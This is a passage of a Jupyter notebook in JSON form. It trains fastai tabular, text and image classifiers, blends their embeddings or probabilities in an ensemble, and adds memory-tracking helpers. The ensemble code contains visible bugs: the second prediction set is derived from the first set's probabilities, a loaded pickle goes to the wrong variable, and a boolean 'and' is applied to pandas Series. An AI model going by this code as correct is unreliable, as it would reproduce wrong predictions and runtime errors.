TabularPandas(df[tab_cols], \n procs, \n cat_names, \n cont_names,\n y_names=y_names, \n y_block=CategoryBlock(),\n splits=splits)\n\n tab_dls = to.dataloaders(bs=8) \n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n\n # tabular learner\n tab_learn = tabular_learner(dls=tab_dls, layers=[200,100], metrics=metrics)\n\n # find optimal learner rate lr\n if lr is None:\n lr=list(tab_learn.lr_find())[0]\n\n # fit learner\n tab_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=lr)\n\n #unfreeze all except the last 2 layers & retrain\n tab_learn.freeze_to(-2)\n tab_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n #unfreeze all except the last 3 layers & retrain\n tab_learn.freeze_to(-3)\n tab_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n # last, unfreeze the whole model & retrain\n tab_learn.unfreeze()\n #tab_learn.fit_one_cycle(epochs, slice(lr/(2.6**4),lr))\n tab_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr/(2.6**4),lr))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n tab_learn.save(model_path+model_name)\n return tab_learn\n\n\n\n", "_____no_output_____" ] ], [ [ "### module: get_fastai_tab_embs()", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_tab_embs(tab_clf, df:pd.DataFrame, cnt_cols:list=None, cat_cols:list=None):\n \"\"\"use classifier to get image embedding vector (np.array)\n Args:\n tab_clf: e.g. fastai.tabular.learner.TabularLearner\n df[cnt_cols+cat_cols]\n Returns:\n embs: a np.array of shape (num_samples, 512)\n\n Examples: \n img_embs = get_fastai_imgs_embs(img_clf=img_clf, df=df.head(5), img_col='name')\n \n \"\"\"\n # define pytorch hook\n class SaveFeatures():\n features=None\n def __init__(self, m): \n self.hook = m.register_forward_hook(self.hook_fn)\n self.features = None\n def hook_fn(self, module, input, output): \n out = output.detach().cpu().numpy()\n if isinstance(self.features, type(None)):\n self.features = out\n else:\n self.features = np.row_stack((self.features, out))\n def remove(self): \n self.hook.remove()\n # identify the layer from which you want to get embeddings\n #print(img_clf.model) \n print(f'====== We will get embedding from {tab_clf.model.layers[1][0]} =======')\n emb_layer = tab_clf.model.layers[1][0]\n #put hook on the selected emb_layer\n sf = SaveFeatures(emb_layer)\n\n # access dls from the trained classifier\n #?? no needed?? test_df = df[cnt_cols+cat_cols]\n test_dl = tab_clf.dls.test_dl(df, with_labels=False)\n \n # run img_clf through test data\n preds, _ = tab_clf.get_preds(dl=test_dl)\n # get the embeddings of test data\n embs = sf.features\n\n return embs\n\n", "_____no_output_____" ], [ "\"\"\"#dbck\ntab_embs = get_fastai_tab_embs(tab_clf=tab_learn, df=df_.head(5))\n\ntab_embs.shape\"\"\"", "_____no_output_____" ] ], [ [ "# 4) ensembled models\n\nBig idea: you can blend multiple classifiers at different stages:\n\n- `early concat`: concatinate cnt, cat, txt, img after data loading and data preprocessing, followed by a learner of choice (e.g. fastai tabular).\n- `middle concat`: concatinate the embeddings from each of the trained tab (cnt+cat), txt, img models, followed by a learner of choice.\n- `late concat`: concatinate the probability predictions from each of the trained tab(cnt+cat), txt, img models, followed by a learner of choice.\n\n\nHere I will do experiment on the `middle concat`: blend embedding(txt_col1) and embedding(img_col2) by a fastai tabular learner.", "_____no_output_____" ], [ "## module: train_ensembled_classifier()", "_____no_output_____" ] ], [ [ "#export\ndef train_ensembled_classifier(embs_ls, lr:float=0.005, max_epochs:int=10, model_path:str='/content/drive/My Drive/fastai_multimodal/model/', model_name:str='tabular_ensemble_enbeddings', n_components:float=1, df=df, label_col=label_col, emb_size=128):\n \"\"\"train an ensembled classifier, using fastai tabular \n Args:\n embs_ls:list of embeddings, each embeddings is a list of 400D-vectors\n lr:float=0.005 learning rate\n max_epochs:int=10 number of epochs to train a tabular learner when unfreeze the whole model\n model_path:str='/content/drive/My Drive/techskills/model/', \n model_name:str='tabular_ensemble_enbeddings', \n n_components:Union[int, float]=1 if use n_components!=1, use PCA to reduce embs_ls' dimension for the sake of fast computation at the price of accuracy; otherwise, do not use PCA\n emb_size:int=128 embedding size\n Returns:\n tab_learner: a trained fastai tabular classifier\n \"\"\"\n \n # create a new df containing label_col plus all txt_cols' embeddings\n # reduce the dimension of df_embs by PCA\n if n_components != 1:\n from sklearn.decomposition import PCA\n pca = PCA(n_components=n_components)\n df_embs = pd.concat([df[[label_col]]]+[pd.DataFrame(pca.fit_transform(embs), index=df.index) for embs in embs_ls], axis=1)\n df_embs.columns = [label_col]+ list(range(df_embs.shape[1]-1)) #fix the repeated column names problem which comes from pd.concat dfs \n else:\n df_embs = pd.concat([df[[label_col]]]+[pd.DataFrame(embs, index=df.index) for embs in embs_ls], axis=1)\n df_embs.columns = [label_col]+ list(range(df_embs.shape[1]-1))\n\n # define variables\n y_names = label_col\n cat_names = []\n cont_names = list(df_embs.columns)[1:]\n tab_cols = [y_names]+cat_names+cont_names\n\n # build fastai tabular dataloader \n procs = [Categorify, FillMissing, Normalize]\n splits = split_idxs(df_embs[tab_cols], train_size=.9, flag_random_split=True)\n to = TabularPandas(df_embs[tab_cols], \n procs, \n cat_names, \n cont_names,\n y_names=y_names, \n y_block=CategoryBlock(),\n splits=splits)\n\n tab_dls = to.dataloaders(bs=8) \n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n\n # tabular learner\n ensembled_learn = tabular_learner(dls=tab_dls, layers=[2*emb_size,emb_size], metrics=metrics)\n\n # find optimal learner rate lr\n if lr is None:\n lr=list(ensembled_learn.lr_find())[0]\n\n # fit learner\n ensembled_learn.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=lr)\n\n #unfreeze all except the last 2 layers & retrain\n ensembled_learn.freeze_to(-2)\n ensembled_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n #unfreeze all except the last 3 layers & retrain\n ensembled_learn.freeze_to(-3)\n ensembled_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n # last, unfreeze the whole model & retrain\n ensembled_learn.unfreeze()\n #tab_learn.fit_one_cycle(epochs, slice(lr/(2.6**4),lr))\n ensembled_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr/(2.6**4),lr))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n ensembled_learn.save(model_path+model_name)\n return ensembled_learn\n\n", "_____no_output_____" ], [ "\"\"\"ensembled_learn = train_ensembled_classifier(embs_ls)\"\"\"", "_____no_output_____" ], [ "\"\"\"df_ = pd.concat([pd.DataFrame(embs) for embs in embs_ls], axis=1)\ndf_.columns = list(range(df_.shape[1]))\n\ntest_dl = ensembled_learn.dls.test_dl(df_) #, with_labels=True\nprobs, _ = ensembled_learn.get_preds(dl=test_dl)\n\nprobs\"\"\"\n", "_____no_output_____" ] ], [ [ "# 5) End2End fastai multimodal model", "_____no_output_____" ] ], [ [ "#export\nclass Fastai_Multimodal_Classifier():\n \"\"\"end to end fastai classifier for multimodal data which includes txt_cols, img_cols, cnt_cols, cat_cols\"\"\"\n def __init__(self, txt_clfs=None, lms=None, tab_clf=None, img_clfs=None, ensembled_clf_embs=None, ensembled_clf_probs=None, model_path='/content/drive/My Drive/fastai_multimodal/model/' ):\n self.txt_clfs = txt_clfs # a list of fastai text classifiers\n self.lms = lms # a list of fastai text language models\n self.tab_clf = tab_clf # a fastai tabular classifier\n self.img_clfs = img_clfs # a list of fastai image classifiers\n self.ensembled_clf_embs = ensembled_clf_embs # a ensembled classifier trained on embs_ls (at this point, using fastai tabular)\n self.ensembled_clf_probs = ensembled_clf_probs # a ensembled classifier trained on probs_ls (at this point, using fastai tabular)\n self.model_path=model_path\n\n \"\"\"def identify_cnt_cat_txt_img(self, df, label_col, cnt_card=0.5, txt_card=0.5):\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_img_split(df, cnt_card=cnt_card, excluded_cols = [label_col], txt_card=txt_card)\n self.txt_cols=txt_cols\n self.cnt_cols=cnt_cols\n self.cat_cols=cat_cols\n self.img_cols=img_cols\"\"\"\n \n def fit(self, df:pd.DataFrame, label_col:str, txt_cols:list=None, img_cols:list=None, cnt_cols:list=None, cat_cols:list=None, img_path:str=img_path):\n \"\"\" In case not provided,\n fit multiple fastai text classifiers for each col in txt_cols;\n fit multiple fastai img classifiers for each col in img_cols;\n fit one fastai tabular classifier for all cnt_cols and cat_cols.\n Args:\n df:pd.DataFrame, containing both label_col and txt_cols \n label_col:str, e.g. 'label'\n txt_cols:list, e.g. ['title_raw',\t'hard_skills_name',\t'title_raw+hard_skills_name']\n img_cols:list, \n cnt_cols:list, \n cat_cols:list\n img_path:str\n Returns:\n None (but update self.txt_clfs, self.lms, self.tab_clf)\n \"\"\"\n df = df.copy()\n \n # in case not provided by user, automatically identify various feature types\n if all(x is None for x in (txt_cols, img_cols, cnt_cols, cat_cols)): \n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_img_split(df, cnt_card=.5, excluded_cols = [label_col], txt_card=0.5)\n print(f'** Given label_col={label_col} ** \\n======= automatically identify\\n cnt_cols={cnt_cols}\\n cat_cols={cat_cols},\\n img_cols={img_cols}, \\n txt_cols={txt_cols} \\n======= make sure that is what you expect; otherwise, manually make changes')\n else: # store columns info in unchangable container\n class CONST(object):\n __slots__ = ()\n cat_cols = cat_cols\n cnt_cols = cnt_cols\n txt_cols = txt_cols\n img_cols = img_cols\n label_col = label_col\n df = df\n c = CONST()\n self.c = c\n\n # convert dtype from object to str & add bin cnt columns to df; also fill missing value\n for col in df.columns:\n if df[[col]].dtypes[col]==np.dtype('O'):\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n if col in cat_cols: # force cat_col to be str type, whether the original one is str or int\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n df[col].fillna(df[col].mode()[0], inplace=True)\n\n \n # since tf.one_hot() does not work withs strings label but integer, convert df[label_col] into integer value\n label_str2num_map = {x:n for (n,x) in enumerate(sorted(df[label_col].unique()))}\n \n # store the cols/features type info\n self.txt_cols=c.txt_cols\n self.cnt_cols=c.cnt_cols\n self.cat_cols=c.cat_cols\n self.img_cols=c.img_cols\n self.label_col=c.label_col\n self.df=df\n self.img_path=img_path\n\n # in case self.tab_clf = None, make tab_clf from stratch\n if self.tab_clf is None and len(c.cnt_cols+c.cat_cols)>0:\n print(f'========================= training classifier with \\n cnt_cols={cnt_cols} and \\n cat_cols={cat_cols}==============================')\n tab_clf = train_fastai_tabular_classifier(c.df, \n cnt_cols=c.cnt_cols,\n cat_cols=c.cat_cols,\n label_col=c.label_col,\n model_path=self.model_path,\n lr=0.005\n )\n\n self.tab_clf = tab_clf\n else:\n self.tab_clf = None\n\n # in case self.txt_clfs = None, train txt_clfs from stratch\n if self.txt_clfs is None and len(c.txt_cols)>0:\n txt_clfs = []\n lms = []\n for txt_col in c.txt_cols:\n print(f'========================= training classifier with txt_col={txt_col}==============================')\n lm, txt_clf = train_fastai_text_classifier(self.df, \n txt_col=txt_col,\n label_col=self.label_col,\n model_path=self.model_path,\n lr=0.005,\n )\n txt_clfs.append(txt_clf)\n lms.append(lm)\n self.txt_clfs = txt_clfs\n self.lms = lms\n\n\n # in case self.img_clfs = None, train img_clfs from stratch\n if self.img_clfs is None and len(c.img_cols)>0:\n img_clfs = []\n\n for img_col in c.img_cols:\n print(f'========================= training classifier with img_col={img_col}==============================')\n img_clf = train_fastai_image_classifier(self.df, \n img_col=img_col,\n label_col=c.label_col,\n model_path=self.model_path,\n img_path=self.img_path,\n model_name=img_col+'_clf',\n lr=0.005\n )\n img_clfs.append(img_clf)\n\n self.img_clfs = img_clfs\n\n\n\n def get_preds(self, test_df:pd.DataFrame, flag_load_embs_probs=False):\n \"\"\"get predictions for test data df[txt_cols + img_cols + cnt_cols + cat_cols]\n Args:\n test_df:pd.DataFrame, containing txt_cols + img_cols + cnt_cols + cat_cols\n txt_cols:list, img_cols:list, cnt_cols:list, cat_cols:list are features splitted into 4 categories: txt, img, cnt, cat\n Returns:\n (preds0, preds1), (probs0, probs1), where\n - preds0, probs0: the predictions on test data based on txt_clfs, img_clfs, tab_clf embeddings extraction `embs_ls`\n - preds1, probs1: the prediction on test data based on txt_clfs, img_clfs, tab_clf output probs_ls\n \n \"\"\"\n df = test_df.copy()\n # convert dtype from object to str & add bin cnt columns to df; also fill missing value\n for col in df.columns:\n if df[[col]].dtypes[col]==np.dtype('O'):\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n if col in cat_cols: # force cat_col to be str type, whether the original one is str or int\n df[col] = df[col].astype('str')\n df.loc[:,col]=df[[col]].fillna('NA')\n df[col].fillna(df[col].mode()[0], inplace=True)\n\n #################################\n ### middle concat: use embs_ls\n #################################\n # get docs embeddings list\n if flag_load_embs_probs:\n import pickle\n with open(\"embs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n else:\n # init embs_ls\n embs_ls = []\n\n # get tab embeddings list\n print(f'========================= extracting tabular embeddings==============================')\n if self.tab_clf is not None and len(self.cnt_cols +self.cat_cols)>0:\n embs = get_fastai_tab_embs(tab_clf=self.tab_clf, df=df, cnt_cols=self.cnt_cols, cat_cols=self.cat_cols)\n embs_ls.append(embs)\n\n # get docs embeddings list\n if len(self.txt_cols)>0:\n for (txt_col, txt_clf, lm) in zip(self.txt_cols, self.txt_clfs, self.lms):\n print(f'========================= extracting txt_col={txt_col} doc embeddings==============================')\n\n embs = get_fastai_docs_embs(docs=df[txt_col], learn=txt_clf, lm=lm, df=None, txt_col=None)\n embs_ls.append(embs)\n\n # get imgs embeddings list\n if len(self.img_cols)>0:\n for (img_col, img_clf) in zip(self.img_cols, self.img_clfs):\n print(f'========================= extracting img_col={img_col} img embeddings==============================')\n embs = get_fastai_imgs_embs(img_clf=img_clf, df=df, img_col=img_col)\n embs_ls.append(embs)\n \n\n \n # store embs_ls\n self.embs_ls = embs_ls\n import pickle\n with open(\"embs_ls.pickle\",\"wb\") as f:\n pickle.dump(embs_ls,f)\n\n # train a ensemble classifier using all embeddings\n ensembled_clf_embs = train_ensembled_classifier(embs_ls, df=df, label_col=label_col) \n self.ensembled_clf_embs = ensembled_clf_embs\n \n\n #################################\n ### late concat: use probs_ls\n #################################\n # get prediction on labels and probabilities\n if flag_load_embs_probs:\n import pickle\n with open(\"probs_ls.pickle\",\"rb\") as f:\n embs_ls = pickle.load(f)\n else:\n # init probs_ls\n probs_ls = []\n\n # probs by tab_clf\n if self.tab_clf is not None and len(self.c.cnt_cols + self.c.cat_cols)>0:\n print(f'========================= calculating tab_cols ({cnt_cols, cat_cols}) probs==============================')\n tab_cols_ = [col for col in self.cnt_cols + self.cat_cols if col.split('_')[-1]!='na'] # tmp: remove added columns look like '*_na'\n _, probs = fastai_learner_preds(learner=self.tab_clf, df=df[tab_cols_], label_col=self.label_col)\n probs_ls.append(probs.numpy())\n\n # probs by txt_clfs\n if len(self.img_cols)>0:\n for (txt_clf, txt_col) in zip(self.txt_clfs, self.txt_cols):\n print(f'========================= calculating txt_col={txt_col} probs ==============================')\n _, probs = fastai_learner_preds(learner=txt_clf, df=df, label_col=self.label_col, txt_col=txt_col)\n probs_ls.append(probs.numpy())\n\n # probs by img_clfs\n if len(self.img_cols)>0:\n for (img_clf, img_col) in zip(self.img_clfs, self.img_cols):\n print(f'========================= calculating img_col={img_col} probs==============================')\n\n _, probs = fastai_learner_preds(learner=img_clf, df=df[[img_col]],label_col=self.label_col)\n probs_ls.append(probs.numpy())\n\n # store probs_ls\n self.probs_ls = probs_ls\n\n # train an ensembled classifier using all probs\n ensembled_clf_probs = train_ensembled_classifier(probs_ls, df=df, label_col=label_col) \n self.ensembled_clf_probs = ensembled_clf_probs\n\n # in case self.ensembled_clf_embs = None, train ensembled_clfs from stratch\n if self.ensembled_clf_embs is None:\n print(f'========================= training ensembled classifier with embs_ls ==============================')\n ensembled_clf_embs =train_ensembled_classifier(embs_ls, \n lr=0.005, \n max_epochs=100, \n model_path=self.model_path, \n model_name='ensembled_model_embs', \n n_components=1, \n df=df, \n label_col=label_col)\n\n self.ensembled_clf_embs = ensembled_clf_embs\n \n # in case self.ensembled_clf_probs = None, train ensembled_clfs from stratch\n if self.ensembled_clf_probs is None:\n print(f'========================= training ensembled classifier with probs_ls ==============================')\n ensembled_clf_embs =train_ensembled_classifier(probs_ls, \n lr=0.005, \n max_epochs=100, \n model_path=self.model_path, \n model_name='ensembled_model_probs', \n n_components=1, \n df=df, \n label_col=label_col)\n\n self.ensembled_clf_embs = ensembled_clf_embs\n\n # ensembled_clf_embs make predictions on embs_ls\n df_ = pd.concat([pd.DataFrame(embs) for embs in self.embs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n test_dl = self.ensembled_clf_embs.dls.test_dl(df_) #, with_labels=True\n\n \n probs0, _ = self.ensembled_clf_embs.get_preds(dl=test_dl)\n preds0 = probs0.numpy().argmax(axis=1)\n\n # ensembled_clf_probs make predictions on probs_ls\n df_ = pd.concat([pd.DataFrame(probs) for probs in self.probs_ls], axis=1)\n df_.columns = list(range(df_.shape[1]))\n\n test_dl = self.ensembled_clf_probs.dls.test_dl(df_) #, with_labels=True\n probs1, _ = self.ensembled_clf_probs.get_preds(dl=test_dl)\n preds1 = probs0.numpy().argmax(axis=1)\n \n return (preds0, preds1), (probs0, probs1)\n\nmultimodal_clf = Fastai_Multimodal_Classifier()\nmultimodal_clf.fit(df=train_df, label_col=label_col, cnt_cols=cnt_cols, cat_cols=cat_cols,txt_cols=txt_cols,img_cols=img_cols)\n(preds0, preds1), (probs0, probs1) = multimodal_clf.get_preds(test_df)\n(preds0, preds1), (probs0, probs1)", "========================= training classifier with \n cnt_cols=['age', 'cumulative_peer_exit_count', 'is_optional', 'is_organizer', 'length_of_service', 'manager_length_of_service', 'meeting_lapse', 'num_direct_reports', 'start_datetime_Dayofyear', 'time_since_last_promotion', 'time_since_new_manager_start_date', 'time_since_new_org_start_date', 'timestamp'] and \n cat_cols=['job_family', 'start_datetime']==============================\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492, 493, 494, 495, 496, 497, 498, 499]\n" ], [ "# dls.vocab.o2i to acess label names from predictions\n\ndls = multimodal_clf.tab_clf.dls\nlabel_name2num = {k: dls.vocab.o2i[k] for k in list(dls.vocab.o2i)}\nlabel_name2num", "_____no_output_____" ], [ "#get samples of False Positive (df_fp) and False Negative (df_fn)\ny_true=y_test; y_pred=preds0; pos_val=2\nfrom sklearn.metrics import confusion_matrix\ny_test= test_df[label_col].map(label_name2num)\ndf_ = pd.DataFrame(zip(y_true, y_pred), columns=['y_true', 'y_pred'], index=test_df.index)\ndf__=pd.concat([df_, test_df],axis=1)\ndf_FP = df__[df__['y_true']==pos_val and df__['y_pred']!=df__['y_true']]\ndf_FP", "/usr/local/lib/python3.7/dist-packages/ipykernel_launcher.py:7: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n import sys\n" ], [ "#export\ndef get_performance_scores(y_true, y_prob, y_pred=None, label_name2num=None, normalize:str='all', **kwargs): \n \"\"\"a wrapper to show common performance scores of a ML model\n Args:\n y_true, y_prob, y_pred=None, label_name2num=None, **kwargs\n normalize : {'true', 'pred', 'all'}, default=None Normalizes confusion matrix over the true (rows), predicted (columns) conditions or all the population. If None, confusion matrix will not be normalized.\n Returns:\n clf_report, cm_df, macro_roc_auc_ovo, weighted_roc_auc_ovo, macro_roc_auc_ovr, weighted_roc_auc_ovr\n\n \"\"\"\n import seaborn as sns \n from sklearn.metrics import roc_auc_score, classification_report\n if y_pred is None:\n y_pred = y_prob.argmax(axis=1)\n\n # Creating a confusion matrix,which compares the y_test and y_pred\n cm = confusion_matrix(y_test, y_pred, normalize=normalize)\n\n # Creating a dataframe for a array-formatted Confusion matrix,so it will be easy for plotting.\n if label_name2num is not None:\n label_vals = list(label_name2num.keys())\n else:\n label_vals = list(range(y_prob.shape[1]))\n cm_df = pd.DataFrame(cm,\n index = label_vals,# e.g. ['SETOSA','VERSICOLR','VIRGINICA']\n columns =label_vals)\n \n #Plotting the confusion matrix\n plt.figure(figsize=(5,4))\n sns.heatmap(cm_df, cmap=\"YlGnBu\", annot=True)\n plt.title('Confusion Matrix')\n plt.ylabel('Actal Values')\n plt.xlabel('Predicted Values')\n plt.show()\n\n # create classification report\n clf_report = classification_report(y_true, y_pred, **kwargs)\n print(f\"=============classification report===============\\n\")\n print(clf_report)\n # make various kinds of roc_auc\n macro_roc_auc_ovo = roc_auc_score(y_true, y_prob, multi_class=\"ovo\", average=\"macro\")\n\n weighted_roc_auc_ovo = roc_auc_score(\n y_test, y_prob, multi_class=\"ovo\", average=\"weighted\"\n )\n\n macro_roc_auc_ovr = roc_auc_score(y_true, y_prob, multi_class=\"ovr\", average=\"macro\")\n\n weighted_roc_auc_ovr = roc_auc_score(\n y_true, y_prob, multi_class=\"ovr\", average=\"weighted\"\n )\n print(\n \"One-vs-One ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by prevalence)\".format(macro_roc_auc_ovo, weighted_roc_auc_ovo)\n )\n print(\n \"One-vs-Rest ROC AUC scores:\\n{:.6f} (macro),\\n{:.6f} \"\n \"(weighted by prevalence)\".format(macro_roc_auc_ovr, weighted_roc_auc_ovr)\n )\n return clf_report, cm_df, macro_roc_auc_ovo, weighted_roc_auc_ovo, macro_roc_auc_ovr, weighted_roc_auc_ovr\n\nprint('============ ensembled method using embs (\"middle concat\")============\\n')\n_ = get_performance_scores(y_true=y_test, y_prob=probs0, label_name2num= label_name2num)\nprint('============ ensembled method using probs (\"late concat\")============\\n')\n_ = get_performance_scores(y_true=y_test, y_prob=probs1, label_name2num= label_name2num)", "============ ensembled method using embs (\"middle concat\")============\n\n" ] ], [ [ "# 6) Bigdata ML\n\n", "_____no_output_____" ], [ "ref:https://gdmarmerola.github.io/big-data-ml-training/\n\n", "_____no_output_____" ], [ "## bigdata ML solu1: ensemble learning", "_____no_output_____" ] ], [ [ "!python -m pip install \"dask[dataframe]\"\n!pip install 'fsspec>=0.3.3'", "Requirement already satisfied: dask[dataframe] in /usr/local/lib/python3.7/dist-packages (2.12.0)\nCollecting fsspec>=0.6.0\n Downloading fsspec-2022.3.0-py3-none-any.whl (136 kB)\n\u001b[K |████████████████████████████████| 136 kB 10.1 MB/s \n\u001b[?25hCollecting partd>=0.3.10\n Downloading partd-1.2.0-py3-none-any.whl (19 kB)\nRequirement already satisfied: numpy>=1.13.0 in /usr/local/lib/python3.7/dist-packages (from dask[dataframe]) (1.21.5)\nRequirement already satisfied: toolz>=0.7.3 in /usr/local/lib/python3.7/dist-packages (from dask[dataframe]) (0.11.2)\nRequirement already satisfied: pandas>=0.23.0 in /usr/local/lib/python3.7/dist-packages (from dask[dataframe]) (1.3.5)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.23.0->dask[dataframe]) (2.8.2)\nRequirement already satisfied: pytz>=2017.3 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.23.0->dask[dataframe]) (2018.9)\nCollecting locket\n Downloading locket-0.2.1-py2.py3-none-any.whl (4.1 kB)\nRequirement already satisfied: six>=1.5 in /usr/local/lib/python3.7/dist-packages (from python-dateutil>=2.7.3->pandas>=0.23.0->dask[dataframe]) (1.15.0)\nInstalling collected packages: locket, partd, fsspec\nSuccessfully installed fsspec-2022.3.0 locket-0.2.1 partd-1.2.0\nRequirement already satisfied: fsspec>=0.3.3 in /usr/local/lib/python3.7/dist-packages (2022.3.0)\n" ], [ "# libs to help us track memory via sampling\nimport numpy as np\nimport tracemalloc\nfrom time import sleep\nimport matplotlib.pyplot as plt\n\n# sampling time in seconds\nSAMPLING_TIME = 0.001\n\nclass MemoryMonitor:\n def __init__(self, close=True):\n \n # start tracemalloc and sets\n # measurement atribute to True\n tracemalloc.start()\n self.keep_measuring = True\n self.close = close\n \n def measure_usage(self):\n \n \"\"\"\n Takes measurements of used memory on\n regular intevals determined by the \n global SAMPLING_TIME constant\n \"\"\"\n \n # list to store memory usage samples\n usage_list = []\n \n # keeps going until someone changes this parameter to false\n while self.keep_measuring:\n \n # takes a sample, stores it in the usage_list and sleeps\n current, peak = tracemalloc.get_traced_memory()\n usage_list.append(current/1e6)\n sleep(SAMPLING_TIME)\n \n # stop tracemalloc and returns list\n if self.close:\n tracemalloc.stop()\n return usage_list\n\n# imports executor\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import wraps\n\ndef plot_memory_use(history, fn_name, open_figure=True, offset=0, **kwargs):\n \n \"\"\"Function to plot memory use from a history collected\n by the MemoryMonitor class\n \"\"\"\n\n # getting times from counts and sampling time\n times = (offset + np.arange(len(history))) * SAMPLING_TIME\n \n # opening figure and plotting\n if open_figure:\n plt.figure(figsize=(10,3), dpi=120)\n plt.plot(times, history, 'k--', linewidth=1)\n plt.fill_between(times, history, alpha=0.5, **kwargs)\n \n # axes titles\n plt.ylabel('Memory usage [MB]')\n plt.xlabel('Time [seconds]')\n plt.title(f'{fn_name} memory usage over time')\n \n # legend\n plt.legend();\n\ndef track_memory_use(plot=True, close=True, return_history=False):\n \n def meta_wrapper(fn):\n \n \"\"\"\n This function is meant to be used as a decorator\n that informs wrapped function memory usage\n \"\"\"\n \n # decorator so we can retrieve original fn\n @wraps(fn)\n def wrapper(*args, **kwargs):\n\n \"\"\"\n Starts wrapped function and holds a process \n to sample memory usage while executing it\n \"\"\"\n\n # context manager for executor\n with ThreadPoolExecutor() as executor:\n\n # start memory monitor\n monitor = MemoryMonitor(close=close)\n mem_thread = executor.submit(monitor.measure_usage)\n\n # start wrapped function and get its result\n try:\n fn_thread = executor.submit(fn, *args, **kwargs)\n fn_result = fn_thread.result()\n\n # when wrapped function ends, stop measuring\n finally:\n monitor.keep_measuring = False\n history = mem_thread.result()\n\n # inform results via prints and plot\n print(f'Current memory usage: {history[-1]:2f}')\n print(f'Peak memory usage: {max(history):2f}')\n if plot:\n plot_memory_use(history, fn.__name__)\n if return_history:\n return fn_result, history\n else:\n return fn_result\n\n return wrapper\n \n return meta_wrapper", "_____no_output_____" ], [ "# to visualize memory use ref:https://gdmarmerola.github.io/big-data-ml-training/\n# track_memory_use will be used as a decorator\n#from nbdev_colab.track_memory import track_memory_use, plot_memory_use\nimport dask.dataframe as dd", "_____no_output_____" ], [ "class EnsembleWrapper:\n \"\"\"\n create an ensembled model of a list of models.\n \"\"\"\n \n def __init__(self, model_list):\n self.model_list = model_list\n def 